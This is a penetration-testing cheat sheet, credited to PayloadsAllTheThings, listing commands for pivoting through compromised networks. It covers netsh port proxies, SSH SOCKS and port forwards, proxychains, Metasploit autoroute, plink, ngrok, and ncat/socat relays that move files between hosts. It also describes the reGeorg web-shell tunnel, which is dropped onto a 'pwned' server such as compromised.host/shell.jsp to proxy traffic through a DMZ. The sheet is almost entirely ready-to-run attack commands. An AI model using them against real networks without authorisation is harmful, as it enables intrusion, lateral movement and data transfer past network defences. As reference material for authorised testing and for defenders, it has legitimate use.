Network Pivoting Techniques

Windows netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport

netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110

listenaddress – is a local IP address waiting for a connection.
listenport – local listening TCP port (the connection is waited on it).
connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
connectport – is a TCP port to which the connection from listenport is forwarded to.

SSH

SOCKS Proxy

ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

Cool Tip : Konami SSH Port forwarding

[ENTER] + [~C]
-D 1090

Supported escape sequences:

~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - request rekey
~V/v - decrease/increase verbosity (LogLevel)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Proxychains

Config file: /etc/proxychains.conf

[ProxyList]
socks4 localhost 8080

Set the SOCKS4 proxy then proxychains nmap -sT 192.168.5.6

Web SOCKS - reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

tunnel.ashx
tunnel.aspx
tunnel.js
tunnel.jsp
tunnel.nosocket.php
tunnel.php
tunnel.tomcat.5.jsp

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]

Metasploit

portfwd list
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445

# OR

run autoroute -s 192.168.57.0/24
use auxiliary/server/socks4a

plink

plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389    --> exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw mypassword 192.168.18.84 -R
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]

ngrok

# get the binary
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip 

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433

Basic Pivoting Types

Type	Use Case
Listen - Listen	Exposed asset, may not want to connect out.
Listen - Connect	Normal redirect.
Connect - Connect	Can’t bind, so connect to bridge two hosts

Listen - Listen

Type	Use Case
ncat	`ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`
socat	`socat -v tcp-listen:8080 tcp-listen:9090`
remote host 1	`ncat localhost 8080 < file`
remote host 2	`ncat localhost 9090 > newfile`

Listen - Connect

Type	Use Case
ncat	`ncat -l -v -p 8080 -c "ncat localhost 9090"`
socat	`socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090`
remote host 1	`ncat localhost -p 8080 < file`
remote host 2	`ncat -l -p 9090 > newfile`

Connect - Connect

Type	Use Case
ncat	`ncat localhost 8080 -c "ncat localhost 9090"`
socat	`socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090`
remote host 1	`ncat -l -p 8080 < file
remote host 2	`ncat -l -p 9090 > newfile`

References

Source: PayloadsAllTheThings